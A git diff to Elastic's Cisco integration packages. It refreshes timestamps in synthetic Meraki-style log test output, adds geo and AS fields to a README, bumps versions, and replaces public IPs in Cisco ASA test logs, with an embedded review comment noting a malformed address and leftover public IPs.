@@ -810,7 +810,7 @@ }, "message": "dunt 1536789735.ames amni events aid=tatio arp_resp=amquisno arp_src=modoc auth_neg_dur=magnam auth_neg_failed=uinesc channel=cid dns_req_rtt=emi dns_resp=Bonorum dns_server=lesti duration=59.289000 full_conn=iosamni identity=idu ip_resp=sis ip_src=10.158.61.228 is_8021x=tsedquia is_wpa=its last_auth_ago=umdolor radio=isiu reason=assi rssi=eserun type=rvelill vap=lupta client_mac=01:00:5e:e6:a6:a2 client_ip=10.186.16.20 instigator=tisu http_resp=remagnam dhcp_lease_completed=nvolupt dhcp_ip=meiusm dhcp_server=nidolo dhcp_server_mac=atquovol dhcp_resp=quunt url=https://www.example.com/seq/moll.htm?sunt=dquianon#urExc category0=tDuis server=10.132.176.96 vpn_type=aria connectivity=inim", "event": { - "ingested": "2021-07-19T09:06:57.318485737Z" + "ingested": "2021-12-09T13:33:18.888695300Z" }, "tags": [ "preserve_original_event" @@ -822,7 +822,7 @@ }, "message": "oremeumf 1538024689.lesti sintocca events dhcp lease of ip 10.105.136.146 from server mac 01:00:5e:bb:aa:f6 for client mac 01:00:5e:69:92:4a with hostname lors2232.api.example from router 10.46.217.155 on subnet amnihil with dns orissus", "event": { - "ingested": "2021-07-19T09:06:57.318487628Z" + "ingested": "2021-12-09T13:33:18.888700400Z" }, "tags": [ "preserve_original_event" @@ -834,7 +834,7 @@ }, "message": "nimadmin 1539259643.lumqui quiavolu flows src=10.245.199.23 dst=10.123.62.215 mac=01:00:5e:1f:7f:1d protocol=udp pattern: 0 iusmodt", "event": { - "ingested": "2021-07-19T09:06:57.318489507Z" + "ingested": "2021-12-09T13:33:18.888705500Z" }, "tags": [ "preserve_original_event" @@ -846,7 +846,7 @@ }, "message": "rep 1540494597.remap deri flows cancel src=10.239.105.121 dst=10.70.7.23 mac=01:00:5e:8e:82:f0 protocol=ipv6 ", "event": { - "ingested": "2021-07-19T09:06:57.318491420Z" + "ingested": "2021-12-09T13:33:18.888710600Z" }, "tags": [ "preserve_original_event" 
@@ -858,7 +858,7 @@ }, "message": "idexeac 1541729552.nimadmin midest_appliance events aid=modt arp_resp=iduntutl arp_src=rsitam auth_neg_dur=xercit auth_neg_failed=ulpaquio channel=itqu dns_req_rtt=minimav dns_resp=smodtem dns_server=roquisqu duration=116.294000 full_conn=iquid identity=evo ip_resp=mcorpori ip_src=10.196.176.243 is_8021x=itesse is_wpa=expl last_auth_ago=essecill radio=totamre reason=rpo rssi=velites type=nonpro vap=nula client_mac=01:00:5e:99:a6:b4 client_ip=10.90.50.149 instigator=nemulla http_resp=asp dhcp_lease_completed=dexercit dhcp_ip=amn dhcp_server=itessequ dhcp_server_mac=porissu dhcp_resp=umd url=https://www.example.net/sectetur/edquian.html?turQuis=taevi#uames category0=tconsec server=10.16.230.121 vpn_type=laboree connectivity=udantiu", "event": { - "ingested": "2021-07-19T09:06:57.318493301Z" + "ingested": "2021-12-09T13:33:18.888715800Z" }, "tags": [ "preserve_original_event" @@ -870,7 +870,7 @@ }, "message": "ttenb olor.quiav gna security_event Nem signature=tdolorem priority=eacomm timestamp=1542964506.upidata dhost=01:00:5e:6a:c8:f8 direction=unknown protocol=ipv6 src=10.246.152.72:4293 dst=10.34.62.190:1641 message:eve", "event": { - "ingested": "2021-07-19T09:06:57.318495236Z" + "ingested": "2021-12-09T13:33:18.888721Z" }, "tags": [ "preserve_original_event" @@ -882,7 +882,7 @@ }, "message": "quisn 1544199460.rem ulamcola events dhcp no offers for mac 01:00:5e:67:fc:cb", "event": { - "ingested": "2021-07-19T09:06:57.318497114Z" + "ingested": "2021-12-09T13:33:18.888726200Z" }, "tags": [ "preserve_original_event" @@ -894,7 +894,7 @@ }, "message": "eruntmo 1545434414.nimve usanti_ events dhcp release for mac 01:00:5e:7d:de:f7", "event": { - "ingested": "2021-07-19T09:06:57.318499299Z" + "ingested": "2021-12-09T13:33:18.888731600Z" }, "tags": [ "preserve_original_event" 
@@ -906,7 +906,7 @@ }, "message": "uatu 1546669369.olupta consequu_ events dhcp release for mac 01:00:5e:6b:96:f2", "event": { - "ingested": "2021-07-19T09:06:57.318501181Z" + "ingested": "2021-12-09T13:33:18.888736900Z" }, "tags": [ "preserve_original_event" @@ -918,7 +918,7 @@ }, "message": "sitam inibusBo.illoin emUtenim ids-alerts signature=ende priority=dexea timestamp=1547904323.acoprotocol=ipv6 src=10.244.32.189 dst=10.121.9.5message: uptas", "event": { - "ingested": "2021-07-19T09:06:57.318503093Z" + "ingested": "2021-12-09T13:33:18.888742100Z" }, "tags": [ "preserve_original_event" @@ -930,7 +930,7 @@ }, "message": "edol 1549139277.sequuntu quameius_ events content_filtering_block url='https://www.example.com/totamrem/aliqu.htm?sBonorum=moenimi#lor' category0='auto' server='10.41.124.15:333'", "event": { - "ingested": "2021-07-19T09:06:57.318505003Z" + "ingested": "2021-12-09T13:33:18.888747300Z" }, "tags": [ "preserve_original_event" @@ -942,7 +942,7 @@ }, "message": "antium 1550374232.remaper eseosq events dhcp no offers for mac 01:00:5e:c3:77:27", "event": { - "ingested": "2021-07-19T09:06:57.318506968Z" + "ingested": "2021-12-09T13:33:18.888751200Z" }, "tags": [ "preserve_original_event" @@ -954,7 +954,7 @@ }, "message": "oditau 1551609186.onsec dit events MAC 01:00:5e:19:86:21 and MAC 01:00:5e:ed:ed:79 both claim IP: 10.43.235.230", "event": { - "ingested": "2021-07-19T09:06:57.318509546Z" + "ingested": "2021-12-09T13:33:18.888755500Z" }, "tags": [ "preserve_original_event" @@ -966,7 +966,7 @@ }, "message": "asper dictasun.psa lorese_ ids-alerts ctobeat ids-alerts signature=onsec priority=idestl timestamp=1552844140.litani shost=01:00:5e:a0:b2:c9 direction=unknown protocol=icmp src=10.199.19.205:5823 dst=10.103.91.159:7116 message: ntut", "event": { - "ingested": "2021-07-19T09:06:57.318511661Z" + "ingested": "2021-12-09T13:33:18.888760100Z" }, "tags": [ "preserve_original_event" 
@@ -978,7 +978,7 @@ }, "message": "estiaec 1554079094.pitlabo tas_appliance flows src=10.17.111.91 dst=10.65.0.157 mac=01:00:5e:49:c4:17 protocol=udp pattern: 1 nostrum", "event": { - "ingested": "2021-07-19T09:06:57.318513794Z" + "ingested": "2021-12-09T13:33:18.888936800Z" }, "tags": [ "preserve_original_event" @@ -990,7 +990,7 @@ }, "message": "ercitati 1555314049.atem serro flows cancel", "event": { - "ingested": "2021-07-19T09:06:57.318515838Z" + "ingested": "2021-12-09T13:33:18.888940Z" }, "tags": [ "preserve_original_event" @@ -1002,7 +1002,7 @@ }, "message": "amquaera 1556549003.rsitamet leumiur events MAC 01:00:5e:fd:79:9e and MAC 01:00:5e:4d:c0:dd both claim IP: 10.20.130.88", "event": { - "ingested": "2021-07-19T09:06:57.318517772Z" + "ingested": "2021-12-09T13:33:18.888945Z" }, "tags": [ "preserve_original_event" @@ -1014,7 +1014,7 @@ }, "message": "abill ametcon.ofdeFini tasnu_ ids-alerts tionev ids-alerts signature=uasiarch priority=velites timestamp=1557783957.uredolorprotocol=ipv6 src=10.177.64.152 dst=10.140.242.86message: temporin", "event": { - "ingested": "2021-07-19T09:06:57.318519678Z" + "ingested": "2021-12-09T13:33:18.888949500Z" }, "tags": [ "preserve_original_event" @@ -1026,7 +1026,7 @@ }, "message": "lor nvolupt.dquia ora_ security_event dipi security_event ecatc signature=quovolu priority=ite timestamp=1559018911.itse shost=01:00:5e:b8:73:c8 direction=external protocol=icmp src=10.199.103.185:2449 dst=10.51.121.223:24 message:stenat", "event": { - "ingested": "2021-07-19T09:06:57.318521638Z" + "ingested": "2021-12-09T13:33:18.888954Z" }, "tags": [ "preserve_original_event" @@ -1038,7 +1038,7 @@ }, "message": "saq 1560253866.asiarch ssuscipi events MAC 01:00:5e:93:48:61 and MAC 01:00:5e:21:c2:55 both claim IP: 10.126.242.58", "event": { - "ingested": "2021-07-19T09:06:57.318523521Z" + "ingested": "2021-12-09T13:33:18.888957600Z" }, "tags": [ "preserve_original_event" 
@@ -1050,7 +1050,7 @@ }, "message": "tlab 1561488820.vel ionevo events dhcp release for mac 01:00:5e:8a:1a:f9", "event": { - "ingested": "2021-07-19T09:06:57.318525448Z" + "ingested": "2021-12-09T13:33:18.888962Z" }, "tags": [ "preserve_original_event" @@ -1062,7 +1062,7 @@ }, "message": "aeab 1562723774.uradipis aerat_ flows uira flows deny src=10.121.37.244 dst=10.113.152.241 mac=01:00:5e:9c:86:62 protocol=udp type=utaliqui ", "event": { - "ingested": "2021-07-19T09:06:57.318527459Z" + "ingested": "2021-12-09T13:33:18.888966100Z" }, "tags": [ "preserve_original_event" @@ -1074,7 +1074,7 @@ }, "message": "nesciu 1563958728.mali roinBCSe_appliance events aid=eetdolor arp_resp=tpersp arp_src=assi auth_neg_dur=rch auth_neg_failed=psa channel=nreprehe dns_req_rtt=pidatatn dns_resp=isno dns_server=luptatev duration=39.622000 full_conn=lla identity=urau ip_resp=aeca ip_src=10.247.118.132 is_8021x=atcupi is_wpa=enima last_auth_ago=uptateve radio=fugitsed reason=lumqui rssi=ectet type=ionu vap=eratv client_mac=01:00:5e:10:8b:c3 client_ip=10.153.33.99 instigator=liq http_resp=xerc dhcp_lease_completed=atisetqu dhcp_ip=squir dhcp_server=gnaaliq dhcp_server_mac=quam dhcp_resp=deriti url=https://www5.example.org/eturadi/umS.txt?mSecti=henderi#taevitae category0=tevel server=10.254.96.130 vpn_type=ita connectivity=iquipexe", "event": { - "ingested": "2021-07-19T09:06:57.318529398Z" + "ingested": "2021-12-09T13:33:18.888970500Z" }, "tags": [ "preserve_original_event" 
@@ -1086,7 +1086,7 @@ }, "message": "tot 1565193683.reme emeumfu events aid=inBCSedu arp_resp=ita arp_src=ade auth_neg_dur=nihilmol auth_neg_failed=nder channel=ano dns_req_rtt=rumexer dns_resp=eab dns_server=iaconseq duration=18.963000 full_conn=eli identity=rissusci ip_resp=ectetur ip_src=10.101.13.122 is_8021x=oconsequ is_wpa=roqui last_auth_ago=oluptate radio=ntut reason=mremaper rssi=uteirur type=ntium vap=ide client_mac=01:00:5e:95:ae:d0 client_ip=10.78.143.52 instigator=ntiumdol http_resp=conse dhcp_lease_completed=aturve dhcp_ip=edqui dhcp_server=tvolu dhcp_server_mac=psu dhcp_resp=strud url=https://internal.example.org/fdeFi/ratv.htm?sequatu=tiumtot#tate category0=udanti server=10.200.98.243 vpn_type=cteturad connectivity=umq", "event": { - "ingested": "2021-07-19T09:06:57.318531386Z" + "ingested": "2021-12-09T13:33:18.888976Z" }, "tags": [ "preserve_original_event" @@ -1098,7 +1098,7 @@ }, "message": "oinvento 1566428637.mporin orissusc_appliance events content_filtering_block url='https://www5.example.net/uov/pariat.htm?litsed=lumd#tiaec' category0='lorem' server='10.247.205.185:7676' client_mac='01:00:5e:6f:21:c8'", "event": { - "ingested": "2021-07-19T09:06:57.318533416Z" + "ingested": "2021-12-09T13:33:18.888980700Z" }, "tags": [ "preserve_original_event" @@ -1110,7 +1110,7 @@ }, "message": "metMa emoen.ptate mipsumqu_ ids-alerts ccusa ids-alerts signature=billo priority=doloremi timestamp=1567663591.ectetura dhost=01:00:5e:0a:88:bb direction=inbound protocol=ipv6 src=10.195.90.73:3914 dst=10.147.165.30:7662 message: idents", "event": { - "ingested": "2021-07-19T09:06:57.318535344Z" + "ingested": "2021-12-09T13:33:18.888983900Z" }, "tags": [ "preserve_original_event" @@ -1122,7 +1122,7 @@ }, "message": "veniamqu 1568898545.iconsequ ueporr_appliance events IDS: empor", "event": { - "ingested": "2021-07-19T09:06:57.318537217Z" + "ingested": "2021-12-09T13:33:18.888988Z" }, "tags": [ "preserve_original_event" 
@@ -1134,7 +1134,7 @@ }, "message": "atDuisa mipsa.uas iat ids-alerts signature=hite priority=adipis timestamp=1570133500.abo dhost=01:00:5e:dd:cb:5b direction=inbound protocol=udp src=10.137.166.97 dst=10.162.202.14 message: ipsaqua", "event": { - "ingested": "2021-07-19T09:06:57.318539100Z" + "ingested": "2021-12-09T13:33:18.888993200Z" }, "tags": [ "preserve_original_event" @@ -1146,7 +1146,7 @@ }, "message": "deom 1571368454.tiumdo rautod_appliance events content_filtering_block url='https://www5.example.com/illoinve/etcon.htm?nevolup=erspici#itinvolu' category0='adeserun' server='10.227.135.142:6598'", "event": { - "ingested": "2021-07-19T09:06:57.318541440Z" + "ingested": "2021-12-09T13:33:18.888998300Z" }, "tags": [ "preserve_original_event" @@ -1158,7 +1158,7 @@ }, "message": "orese 1572603408.umdolore umqui_appliance events MAC 01:00:5e:f1:b8:3a and MAC 01:00:5e:37:9c:af both claim IP: 10.199.29.19", "event": { - "ingested": "2021-07-19T09:06:57.318543577Z" + "ingested": "2021-12-09T13:33:18.889002Z" }, "tags": [ "preserve_original_event" @@ -1170,7 +1170,7 @@ }, "message": "explicab 1573838362.samvolu teiru_appliance events dhcp no offers for mac 01:00:5e:b8:06:92", "event": { - "ingested": "2021-07-19T09:06:57.318545452Z" + "ingested": "2021-12-09T13:33:18.889006100Z" }, "tags": [ "preserve_original_event" 
@@ -1182,7 +1182,7 @@ }, "message": "rissusci 1575073317.uaturQ iusmod_ events aid=mips arp_resp=iduntutl arp_src=mipsumd auth_neg_dur=eiusmo auth_neg_failed=quelauda channel=rcit dns_req_rtt=dolo dns_resp=ulamc dns_server=doe duration=10.574000 full_conn=remquela identity=toreve ip_resp=squirat ip_src=10.85.59.172 is_8021x=mto is_wpa=iae last_auth_ago=dent radio=Uten reason=tatiset rssi=sequat type=modoco vap=beataevi client_mac=01:00:5e:92:d8:95 client_ip=10.158.215.216 instigator=deritin http_resp=ptate dhcp_lease_completed=lloi dhcp_ip=nseq dhcp_server=equunt dhcp_server_mac=tutla dhcp_resp=usmod url=https://example.com/qui/itse.gif?orsitame=tasn#exeaco category0=upta server=10.75.122.111 vpn_type=reprehe connectivity=deFinib", "event": { - "ingested": "2021-07-19T09:06:57.318547323Z" + "ingested": "2021-12-09T13:33:18.889011200Z" }, "tags": [ "preserve_original_event" @@ -1194,7 +1194,7 @@ }, "message": "orr 1576308271.pre aute events IDS: rchite", "event": { - "ingested": "2021-07-19T09:06:57.318549217Z" + "ingested": "2021-12-09T13:33:18.889015300Z" }, "tags": [ "preserve_original_event" diff --git a/packages/cisco/docs/README.md b/packages/cisco/docs/README.md index 9321e5b4d8a..be665e2a1f1 100644 --- a/packages/cisco/docs/README.md +++ b/packages/cisco/docs/README.md 
@@ -811,10 +811,13 @@ An example event for `ios` looks as following:
 | destination.address | Some event destination addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword |
 | destination.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long |
 | destination.as.organization.name | Organization name. | keyword |
+| destination.geo.city_name | City name. | keyword |
 | destination.geo.continent_name | Name of the continent. | keyword |
 | destination.geo.country_iso_code | Country ISO code. | keyword |
 | destination.geo.country_name | Country name. | keyword |
 | destination.geo.location | Longitude and latitude. | geo_point |
+| destination.geo.region_iso_code | Region ISO code. | keyword |
+| destination.geo.region_name | Region name. | keyword |
 | destination.ip | IP address of the destination (IPv4 or IPv6). | ip |
 | destination.port | Port of the destination. | long |
 | ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword |
@@ -872,6 +875,15 @@ An example event for `ios` looks as following:
 | related.ip | All of the IPs seen on your event. | ip |
 | related.user | All the user names or other user identifiers seen on the event. | keyword |
 | source.address | Some event source addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword |
+| source.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long |
+| source.as.organization.name | Organization name. | keyword |
+| source.geo.city_name | City name. | keyword |
+| source.geo.continent_name | Name of the continent. | keyword |
+| source.geo.country_iso_code | Country ISO code. | keyword |
+| source.geo.country_name | Country name. | keyword |
+| source.geo.location | Longitude and latitude. | geo_point |
+| source.geo.region_iso_code | Region ISO code. | keyword |
+| source.geo.region_name | Region name. | keyword |
 | source.ip | IP address of the source (IPv4 or IPv6). | ip |
 | source.packets | Packets sent from the source to the destination. | long |
 | source.port | Port of the source. | long |
diff --git a/packages/cisco/manifest.yml b/packages/cisco/manifest.yml
index 3a002b9a62a..2ea35bb6595 100644
--- a/packages/cisco/manifest.yml
+++ b/packages/cisco/manifest.yml
@@ -1,7 +1,7 @@
 format_version: 1.0.0
 name: cisco
 title: Cisco
-version: 0.12.3
+version: 0.12.4
 license: basic
 description: Deprecated. Use a specific Cisco package instead.
 type: integration
diff --git a/packages/cisco_asa/_dev/deploy/docker/sample_logs/cisco-asa.log b/packages/cisco_asa/_dev/deploy/docker/sample_logs/cisco-asa.log
index 0cc07d2623f..b465e2da68d 100644
--- a/packages/cisco_asa/_dev/deploy/docker/sample_logs/cisco-asa.log
+++ b/packages/cisco_asa/_dev/deploy/docker/sample_logs/cisco-asa.log
@@ -1 +1 @@
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:100.66.98.44/8256
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256
diff --git a/packages/cisco_asa/changelog.yml b/packages/cisco_asa/changelog.yml
index 36d1c7a33e0..38d06dc133f 100644
--- a/packages/cisco_asa/changelog.yml
+++ b/packages/cisco_asa/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.3.1"
+  changes:
+    - description: Change test public IPs to the supported subset
+      type: bugfix
+      link: https://github.com/elastic/integrations/pull/2327
 - version: "1.3.0"
   changes:
     - description: Add 8.0.0 version constraint
diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log
index 0c3aef67223..2c96d1eec05 100644
--- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log
+++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log
@@ -1,38 +1,38 @@
-May 5 17:51:17 dev01: %FTD-6-302013: Built inbound TCP connection 111111111 for net:10.10.10.10/53500 (8.8.8.8/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500)
-May 5 17:51:17 dev01: %FTD-6-302015: Built inbound UDP connection 111111111 for net:10.10.10.10/53500 (8.8.8.8/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500)
-May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 3
+May 5 17:51:17 dev01: %FTD-6-302013: Built inbound TCP connection 111111111 for net:10.10.10.10/53500 (81.2.69.144/53500) to fw111:192.168.2.2/53500 (81.2.69.144/53500)
+May 5 17:51:17 dev01: %FTD-6-302015: Built inbound UDP connection 111111111 for net:10.10.10.10/53500 (81.2.69.144/53500) to fw111:192.168.2.2/53500 (81.2.69.144/53500)
+May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 3
 May 5 17:51:17 dev01: %FTD-7-609002: Teardown local-host net:192.168.2.2 duration 0:00:00
 May 5 17:51:17 dev01: %FTD-7-609001: Built local-host net:192.168.2.2
-May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 1
-May 5 17:51:17 dev01: %FTD-6-805001: Offloaded TCP Flow for connection 111111111 from fw111:10.10.10.10/111 (8.8.8.8/111) to fw111:192.168.2.2/111 (8.8.5.4/111)
+May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 1
+May 5 17:51:17 dev01: %FTD-6-805001: Offloaded TCP Flow for connection 111111111 from fw111:10.10.10.10/111 (81.2.69.144/111) to fw111:192.168.2.2/111 (81.2.69.144/111)
 May 5 17:51:17 dev01: %FTD-6-805002: TCP Flow is no longer offloaded for connection 941243214 from net:10.192.18.4/51261 (10.192.18.4/51261) to fw109:10.192.70.66/443 (10.192.70.66/443)
 May 5 17:51:17 dev01: %FTD-7-710005: UDP request discarded from 192.168.2.2/68 to fw111:10.10.10.10/67
 May 5 17:51:17 dev01: %FTD-6-303002: FTP connection from net:192.168.2.2/63656 to fw111:10.192.18.4/21, user testuser Stored file /export/home/sysm/ftproot/sdsdsds/tmp.log
 May 5 17:51:17 dev01: %FTD-7-710006: VRRP request discarded from 192.168.2.2 to fw111:192.18.4
-May 5 17:51:17 dev01: %FTD-4-313005: No matching connection for ICMP error message: icmp src fw111:10.192.33.100 dst fw111:192.18.4 (type 3, code 3) on fw111 interface. Original IP payload: udp src 192.18.4/53 dst 8.8.8.8/10872.
-May 5 18:16:21 dev01: %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.2/0 gaddr 8.8.8.8/2 laddr 10.10.10.10/2 type 8 code 0
+May 5 17:51:17 dev01: %FTD-4-313005: No matching connection for ICMP error message: icmp src fw111:10.192.33.100 dst fw111:192.18.4 (type 3, code 3) on fw111 interface. Original IP payload: udp src 192.18.4/53 dst 81.2.69.144/10872.
+May 5 18:16:21 dev01: %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.2/0 gaddr 81.2.69.144/2 laddr 10.10.10.10/2 type 8 code 0
 May 5 18:22:35 dev01: %ASA-7-609001: Built local-host net:10.10.10.10
 May 5 18:24:31 dev01: %ASA-7-609002: Teardown local-host identity:10.10.10.10 duration 0:00:00
-May 5 18:29:32 dev01: %ASA-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 10.192.46.90/0
-May 5 18:29:32 dev01: %ASA-6-302020: Built outbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 3
+May 5 18:29:32 dev01: %ASA-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 10.192.46.90/0
+May 5 18:29:32 dev01: %ASA-6-302020: Built outbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 3
 May 5 18:29:32 dev01: %ASA-6-302014: Teardown TCP connection 2960892904 for out111:10.10.10.10/443 to fw111:192.168.2.2/55225 duration 0:00:00 bytes 0 TCP Reset-I
-May 5 18:29:32 dev01: %ASA-6-302013: Built outbound TCP connection 1588662 for intfacename:192.168.2.2/80 (8.8.8.8/80) to net:10.10.10.10/54839 (8.8.8.8/54839)
+May 5 18:29:32 dev01: %ASA-6-302013: Built outbound TCP connection 1588662 for intfacename:192.168.2.2/80 (81.2.69.144/80) to net:10.10.10.10/54839 (81.2.69.144/54839)
 May 5 18:29:32 dev01: %ASA-6-302012: Teardown dynamic UDP translation from fw111:10.10.10.10/54230 to out111:192.168.2.2/54230 duration 0:00:00
 May 5 18:40:50 dev01: %ASA-4-313004: Denied ICMP type=0, from laddr 10.10.10.10 on interface fw502 to 192.168.2.2: no matching session
 May 5 18:40:50 dev01: %ASA-6-305011: Built dynamic TCP translation from fw111:10.10.10.10/57006 to out111:192.168.2.2/57006
 May 5 18:40:50 dev01: %ASA-2-106001: Inbound TCP connection denied from 192.168.2.2/43803 to 10.10.10.10/14322 flags SYN on interface out111
-May 5 18:40:50 dev01: %ASA-2-302016: Teardown UDP connection 1671727 for intfacename:10.10.10.10/161 to net:192.186.2.2/53356 duration 0:02:04 bytes 64585
-May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (8.8.8.8/22638)
-May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (8.8.8.8/22638)
+May 5 18:40:50 dev01: %ASA-2-302016: Teardown UDP connection 1671727 for intfacename:10.10.10.10/161 to net:1192.168.2.2/53356 duration 0:02:04 bytes 64585
+May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (81.2.69.144/161) to net:192.168.2.2/22638 (81.2.69.144/22638)
+May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (81.2.69.144/161) to net:192.168.2.2/22638 (81.2.69.144/22638)
 May 5 18:40:50 dev01: %ASA-4-106023: Deny tcp src fw111:10.10.10.10/64388 dst out111:192.168.2.2/443 by access-group "out1111_access_out" [0x47e21ef4, 0x47e21ef4]
 May 5 18:40:50 dev01: %ASA-4-106021: Deny TCP reverse path check from 192.168.2.2 to 10.10.10.10 on interface fw111
 May 5 19:02:58 dev01: %ASA-2-106006: Deny inbound UDP from 192.168.2.2/65020 to 10.10.10.10/65020 on interface fw111
 May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/53089 to 10.10.10.10/443 flags FIN PSH ACK on interface out111
 May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/17127 to 10.10.10.10/443 flags PSH ACK on interface out111
 May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/24223 to 10.10.10.10/443 flags RST on interface fw111
-May 5 19:02:58 dev01: %ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051)
-May 5 19:02:58 dev01: %ASA-6-302022: Built forwarder stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051)
-May 5 19:02:58 dev01: %ASA-6-302022: Built backup stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (8.8.8.8/10051)
+May 5 19:02:58 dev01: %ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (81.2.69.144/10051)
+May 5 19:02:58 dev01: %ASA-6-302022: Built forwarder stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (81.2.69.144/10051)
+May 5 19:02:58 dev01: %ASA-6-302022: Built backup stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (81.2.69.144/10051)
 May 5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for fw111:10.10.10.10/39210 to net:192.168.2.2/10051 duration 0:00:00 forwarded bytes 0 Cluster flow with CLU closed on owner
 May 5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for net:10.10.10.10/10051 to unknown:192.168.2.2/39222 duration 0:00:00 forwarded bytes 0 Forwarding or redirect flow removed to create director or backup flow
 May 5 19:03:27 dev01: %ASA-7-111009: User 'aaaa' executed cmd: show access-list fw211111_access_out brief
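Review bot: The rewritten 302016 line now reads `net:1192.168.2.2/53356`, which is not a valid IPv4 address (first octet 1192), where the removed line had the routable `192.186.2.2`; this looks like a typo for `192.168.2.2`, and as written the line exercises the pipeline's handling of an unparseable address rather than a private one (the backup 302022 line likewise still carries the pre-existing `192.1682.2.2`, which may or may not be intentional). The public address `8.8.8.5` is still present on new-side lines — the three 302022 stub lines here and the 302026 and 302024 lines in the @@ -40,10 hunk — although the commit title says the public test IPs were to be moved to the supported subset, so enrichment for those lines will presumably still differ from the rest of the fixture. The 302013, 302015 and 805001 lines now use `81.2.69.144` for both the mapped source and the mapped destination where the removed lines used two distinct addresses, so a pipeline that swapped the source and destination mapped fields would no longer be caught by this fixture; the same applies to the 302304 line in the @@ -52,9 hunk. Using two distinct addresses from the supported subset for each source/destination pair would keep that check.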
@@ -40,10 +40,10 @@ May 5 19:02:26 dev01: %ASA-7-111009: User 'aaaa' executed cmd: show access-list
 May 5 19:02:26 dev01: %ASA-6-106100: access-list fw111_out permitted tcp ptaaac/192.168.2.2(62157) -> fw111/10.10.10.10(3452) hit-cnt 1 first hit [0x38ff326b, 0x00000000]
 May 5 19:02:26 dev01: %ASA-6-106100: access-list fw111_out permitted tcp net/192.168.2.2(49033) -> fw111/10.10.10.10(6007) hit-cnt 2 300-second interval [0x38ff326b, 0x00000000]
 May 5 19:02:26 dev01: %ASA-6-302027: Teardown stub ICMP connection for fw1111:10.10.10.10/6426 to net:192.168.2.2/0 duration 1:00:04 forwarded bytes 56 Cluster flow with CLU closed on owner
-May 5 19:02:26 dev01: %ASA-6-302026: Built director stub ICMP connection for fw111:10.10.10.10/32004 (8.8.8.5) to net:192.168.2.2/0 (8.8.8.8)
+May 5 19:02:26 dev01: %ASA-6-302026: Built director stub ICMP connection for fw111:10.10.10.10/32004 (8.8.8.5) to net:192.168.2.2/0 (81.2.69.144)
 May 5 19:02:26 dev01: %ASA-7-710005: UDP request discarded from 10.10.10.10/1985 to net:192.168.2.2/1985
 May 5 19:02:26 dev01: %ASA-6-302025: Teardown stub UDP connection for net:192.168.2.2/123 to unknown:10.10.10.10/123 duration 0:01:00 forwarded bytes 48 Cluster flow with CLU removed from due to idle timeout
